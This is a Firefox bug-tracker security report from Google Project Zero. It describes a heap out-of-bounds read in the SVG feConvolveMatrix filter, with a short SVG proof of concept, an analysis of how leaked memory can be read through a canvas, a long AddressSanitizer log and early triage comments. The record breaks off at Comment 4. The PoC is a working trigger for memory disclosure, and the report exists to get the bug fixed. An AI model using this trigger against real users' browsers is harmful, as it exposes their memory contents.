Status
()
People
(Reporter: Ivan Fratric, Assigned: vliu)
Tracking
({csectype-bounds, sec-high, testcase})
Firefox Tracking Flags
(firefox-esr4553+ verified, firefox52 wontfix, firefox-esr5253+ verified, firefox53+ verified, firefox54+ verified, firefox55+ verified)
Details
(Whiteboard: [Disclosure deadline: June 15][post-critsmash-triage][adv-main53+][adv-esr52.1+][adv-esr45.9+], URL)
Attachments
(3 attachments)
|
178 bytes,
text/html
|
Details | |
|
1.50 KB,
patch
|
dholbert
:
review+
lizzard
:
approval-mozilla-aurora+
lizzard
:
approval-mozilla-beta+
jcristau
:
approval-mozilla-esr45+
jcristau
:
approval-mozilla-esr52+
abillings
:
sec-approval+
|
Details | Diff | Splinter Review |
|
2.07 KB,
patch
|
dholbert
:
review+
|
Details | Diff | Splinter Review |
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36
Steps to reproduce:
There is an out of bound read leading to memory disclosure in Firefox. The vulnerability was confirmed on the nightly ASan build.
Please note: This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
With any fix, please give credit for identifying the vulnerability to Ivan Fratric of Google Project Zero.
PoC:
=================================================================
<svg filter="url(#f)">
<filter id="f" filterRes="19" filterUnits="userSpaceOnUse">
<feConvolveMatrix kernelMatrix="1 1 1 1 1 1 1 1 1" kernelUnitLength="1 -1" />
=================================================================
Preliminary analysis:
The problem seems to be the negative krenel unit length. This leads to an out-of-bound access in ConvolvePixel() and out-of-bounds data is going to be copied into the SVG image. From there, it can be extracted by an attacker by loading the SVG image into a canvas element.
ASan log:
=================================================================
==25524==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f8cd2946336 at pc 0x7f8d3fcd397e bp 0x7ffc051ca390 sp 0x7ffc051ca388
READ of size 1 at 0x7f8cd2946336 thread T0
#0 0x7f8d3fcd397d in ColorComponentAtPoint /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2293:10
#1 0x7f8d3fcd397d in ConvolvePixel<int> /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2358
#2 0x7f8d3fcd397d in already_AddRefed<mozilla::gfx::DataSourceSurface> mozilla::gfx::FilterNodeConvolveMatrixSoftware::DoRender<int>(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, int, int) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2509
#3 0x7f8d3fcd089a in mozilla::gfx::FilterNodeConvolveMatrixSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2379:12
#4 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
#5 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25
#6 0x7f8d3fce4035 in mozilla::gfx::FilterNodeCropSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3140:10
#7 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
#8 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25
#9 0x7f8d3fce4895 in mozilla::gfx::FilterNodeUnpremultiplySoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3197:5
#10 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
#11 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25
#12 0x7f8d3fcc7832 in mozilla::gfx::FilterNodeComponentTransferSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:1781:5
#13 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
#14 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25
#15 0x7f8d3fce4685 in mozilla::gfx::FilterNodePremultiplySoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3168:5
#16 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
#17 0x7f8d3fc7cb43 in mozilla::gfx::FilterNodeSoftware::Draw(mozilla::gfx::DrawTarget*, mozilla::gfx::RectTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::PointTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::DrawOptions const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:580:14
#18 0x7f8d3fd8bc6e in mozilla::gfx::FilterSupport::RenderFilterDescription(mozilla::gfx::DrawTarget*, mozilla::gfx::FilterDescription const&, mozilla::gfx::RectTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, nsTArray<RefPtr<mozilla::gfx::SourceSurface> >&, mozilla::gfx::PointTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::DrawOptions const&) /home/worker/workspace/build/src/gfx/src/FilterSupport.cpp:1360:8
#19 0x7f8d44ccc3fd in nsFilterInstance::Render(mozilla::gfx::DrawTarget*) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:545:3
#20 0x7f8d44ccb7ee in nsFilterInstance::PaintFilteredFrame(nsIFrame*, mozilla::gfx::DrawTarget*, gfxMatrix const&, nsSVGFilterPaintCallback*, nsRegion const*) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:81:19
#21 0x7f8d44d09f72 in nsSVGIntegrationUtils::PaintFilter(nsSVGIntegrationUtils::PaintFramesParams const&) /home/worker/workspace/build/src/layout/svg/nsSVGIntegrationUtils.cpp:1094:5
#22 0x7f8d44f7e9bd in PaintAsLayer /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:8330:30
#23 0x7f8d44f7e9bd in PaintInactiveLayer /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:3722
#24 0x7f8d44f7e9bd in mozilla::FrameLayerBuilder::PaintItems(nsTArray<mozilla::FrameLayerBuilder::ClippedDisplayItem>&, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, gfxContext*, nsRenderingContext*, nsDisplayListBuilder*, nsPresContext*, mozilla::gfx::IntPointTyped<mozilla::gfx::UnknownUnits> const&, float, float, int) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6044
#25 0x7f8d44f819f2 in mozilla::FrameLayerBuilder::DrawPaintedLayer(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, void*) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6233:19
#26 0x7f8d40034966 in mozilla::layers::ClientPaintedLayer::PaintThebes(nsTArray<mozilla::layers::ReadbackProcessor::Update>*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:85:5
#27 0x7f8d40035611 in mozilla::layers::ClientPaintedLayer::RenderLayerWithReadback(mozilla::layers::ReadbackProcessor*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:139:3
#28 0x7f8d4006810f in mozilla::layers::ClientContainerLayer::RenderLayer() /home/worker/workspace/build/src/gfx/layers/client/ClientContainerLayer.h:57:29
#29 0x7f8d4006810f in mozilla::layers::ClientContainerLayer::RenderLayer() /home/worker/workspace/build/src/gfx/layers/client/ClientContainerLayer.h:57:29
#30 0x7f8d4002fcb7 in mozilla::layers::ClientLayerManager::EndTransactionInternal(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) /home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:358:13
#31 0x7f8d40030527 in mozilla::layers::ClientLayerManager::EndTransaction(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) /home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:411:3
#32 0x7f8d44ff4b51 in nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:2253:17
#33 0x7f8d447e7554 in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&, unsigned int, nsDisplayListBuilderMode, nsLayoutUtils::PaintFrameFlags) /home/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3714:12
#34 0x7f8d446eaf2a in mozilla::PresShell::Paint(nsView*, nsRegion const&, unsigned int) /home/worker/workspace/build/src/layout/base/PresShell.cpp:6489:5
#35 0x7f8d43f4cff4 in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) /home/worker/workspace/build/src/view/nsViewManager.cpp:483:19
#36 0x7f8d43f4c54f in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) /home/worker/workspace/build/src/view/nsViewManager.cpp:415:33
#37 0x7f8d43f4faed in nsViewManager::ProcessPendingUpdates() /home/worker/workspace/build/src/view/nsViewManager.cpp:1104:5
#38 0x7f8d44648596 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2031:11
#39 0x7f8d44654553 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:299:7
#40 0x7f8d44654224 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:321:5
#41 0x7f8d446569c5 in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:711:5
#42 0x7f8d446569c5 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:624
#43 0x7f8d44656bfe in applyImpl<mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), StoreCopyPassByConstLRef<mozilla::TimeStamp> , 0> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:855:12
#44 0x7f8d44656bfe in apply<mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp)> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:861
#45 0x7f8d44656bfe in mozilla::detail::RunnableMethodImpl<mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver*, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), true, false, mozilla::TimeStamp>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:890
#46 0x7f8d3e06238c in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
#47 0x7f8d3e05ecb8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
#48 0x7f8d3ee06e21 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
#49 0x7f8d3ed67980 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
#50 0x7f8d3ed67980 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
#51 0x7f8d3ed67980 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
#52 0x7f8d43fc682f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
#53 0x7f8d474273c1 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:30
#54 0x7f8d475e78ca in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4492:22
#55 0x7f8d475e9353 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4670:8
#56 0x7f8d475ea6dc in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4761:21
#57 0x4eb2b3 in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:236:22
#58 0x4eb2b3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:307
#59 0x7f8d5914d82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
#60 0x41ce08 in _start (/home/ifratric/p0/latest/firefox/firefox+0x41ce08)
0x7f8cd2946336 is located 1226 bytes to the left of 162639-byte region [0x7f8cd2946800,0x7f8cd296e34f)
allocated by thread T0 here:
#0 0x4bb873 in calloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:72:3
#1 0x7f8d3fd5a936 in Realloc /home/worker/workspace/build/src/gfx/2d/Tools.h:179:41
#2 0x7f8d3fd5a936 in mozilla::gfx::SourceSurfaceAlignedRawData::Init(mozilla::gfx::IntSizeTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SurfaceFormat, bool, unsigned char, int) /home/worker/workspace/build/src/gfx/2d/SourceSurfaceRawData.cpp:66
#3 0x7f8d3fc40c98 in mozilla::gfx::Factory::CreateDataSourceSurface(mozilla::gfx::IntSizeTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SurfaceFormat, bool) /home/worker/workspace/build/src/gfx/2d/Factory.cpp:878:16
#4 0x7f8d3fcb1bd7 in mozilla::gfx::GetDataSurfaceInRect(mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::ConvolveMatrixEdgeMode) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:434:5
#5 0x7f8d3fcb8903 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:753:15
#6 0x7f8d3fcd0d8d in already_AddRefed<mozilla::gfx::DataSourceSurface> mozilla::gfx::FilterNodeConvolveMatrixSoftware::DoRender<int>(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, int, int) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2460:5
#7 0x7f8d3fcd089a in mozilla::gfx::FilterNodeConvolveMatrixSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2379:12
#8 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
#9 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25
#10 0x7f8d3fce4035 in mozilla::gfx::FilterNodeCropSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3140:10
#11 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
#12 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25
#13 0x7f8d3fce4895 in mozilla::gfx::FilterNodeUnpremultiplySoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3197:5
#14 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
#15 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25
#16 0x7f8d3fcc7832 in mozilla::gfx::FilterNodeComponentTransferSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:1781:5
#17 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
#18 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25
#19 0x7f8d3fce4685 in mozilla::gfx::FilterNodePremultiplySoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3168:5
#20 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
#21 0x7f8d3fc7cb43 in mozilla::gfx::FilterNodeSoftware::Draw(mozilla::gfx::DrawTarget*, mozilla::gfx::RectTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::PointTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::DrawOptions const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:580:14
#22 0x7f8d3fd8bc6e in mozilla::gfx::FilterSupport::RenderFilterDescription(mozilla::gfx::DrawTarget*, mozilla::gfx::FilterDescription const&, mozilla::gfx::RectTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, nsTArray<RefPtr<mozilla::gfx::SourceSurface> >&, mozilla::gfx::PointTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::DrawOptions const&) /home/worker/workspace/build/src/gfx/src/FilterSupport.cpp:1360:8
#23 0x7f8d44ccc3fd in nsFilterInstance::Render(mozilla::gfx::DrawTarget*) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:545:3
#24 0x7f8d44ccb7ee in nsFilterInstance::PaintFilteredFrame(nsIFrame*, mozilla::gfx::DrawTarget*, gfxMatrix const&, nsSVGFilterPaintCallback*, nsRegion const*) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:81:19
#25 0x7f8d44d09f72 in nsSVGIntegrationUtils::PaintFilter(nsSVGIntegrationUtils::PaintFramesParams const&) /home/worker/workspace/build/src/layout/svg/nsSVGIntegrationUtils.cpp:1094:5
#26 0x7f8d44f7e9bd in PaintAsLayer /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:8330:30
#27 0x7f8d44f7e9bd in PaintInactiveLayer /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:3722
#28 0x7f8d44f7e9bd in mozilla::FrameLayerBuilder::PaintItems(nsTArray<mozilla::FrameLayerBuilder::ClippedDisplayItem>&, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, gfxContext*, nsRenderingContext*, nsDisplayListBuilder*, nsPresContext*, mozilla::gfx::IntPointTyped<mozilla::gfx::UnknownUnits> const&, float, float, int) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6044
#29 0x7f8d44f819f2 in mozilla::FrameLayerBuilder::DrawPaintedLayer(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, void*) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6233:19
#30 0x7f8d40034966 in mozilla::layers::ClientPaintedLayer::PaintThebes(nsTArray<mozilla::layers::ReadbackProcessor::Update>*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:85:5
#31 0x7f8d40035611 in mozilla::layers::ClientPaintedLayer::RenderLayerWithReadback(mozilla::layers::ReadbackProcessor*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:139:3
#32 0x7f8d4006810f in mozilla::layers::ClientContainerLayer::RenderLayer() /home/worker/workspace/build/src/gfx/layers/client/ClientContainerLayer.h:57:29
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2293:10 in ColorComponentAtPoint
Shadow bytes around the buggy address:
0x0ff21a520c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ff21a520c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ff21a520c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ff21a520c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ff21a520c50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0ff21a520c60: fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa
0x0ff21a520c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ff21a520c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ff21a520c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ff21a520ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ff21a520cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==25524==ABORTING
Milan, can you find an owner for this?
Group: firefox-core-security → core-security
Component: Untriaged → Graphics
Flags: needinfo?(milan)
Product: Firefox → Core
|
||
Updated•9 months ago
|
||
Group: core-security → gfx-core-security
Keywords: csectype-bounds, sec-high
Whiteboard: [Disclosure deadline: June 15]
|
|
||
Comment 2•9 months ago
|
||
Ivan: where did you get your ASAN build? If you built it yourself it may be a true nightly, but if you're getting it from our archive site that stopped updating and could be an old build. The about Firefox dialog (or user agent) will show the actual build date which would be helpful.
|
||
Comment 3•9 months ago
|
||
Ivan, we think this might be a known (fixed) issue. There has been an issue where people pulling ASAN nightly builds from archive.mozilla.org were getting out of date builds because of infrastructure changes. If you weren't making your own builds or pulling from taskcluster, can you try this with a current taskcluster made ASAN build. Instructions are as follows (from an email to my fuzzing team): Manual browsing: 1. Go to https://tools.taskcluster.net/index/artifacts/#gecko.v2.mozilla-central.latest.firefox/gecko.v2.mozilla-central.latest.firefox.linux64-asan-opt 2. On the right side, you will see the most recent build (the browser is in "public/build/target.tar.bz2"). Automated downloading: There is a JSON API for accessing the index and the artifacts of a task, so you would have to: 1. Fetch https://index.taskcluster.net/v1/task/gecko.v2.mozilla-central.latest.firefox.linux64-asan-opt 2. Extract the taskId from the response. 3. Fetch https://queue.taskcluster.net/v1/task/<TASKID>/artifacts (replace <TASKID> with the id from the previous response). 4. Extract list of desired files and fetch them by appending them to the previous URL, e.g. the browser will be at: https://queue.taskcluster.net/v1/task/<TASKID>/artifacts/public/build/target.tar.bz2
Group: gfx-core-security → core-security
Flags: needinfo?(ifratric)
Keywords: csectype-bounds, sec-high
Whiteboard: [Disclosure deadline: June 15]
|
|
||
Updated•9 months ago
|
||
Keywords: csectype-bounds, sec-high
Whiteboard: [Disclosure deadline: June 15]
|
||
Comment 4•9 months ago
|
||
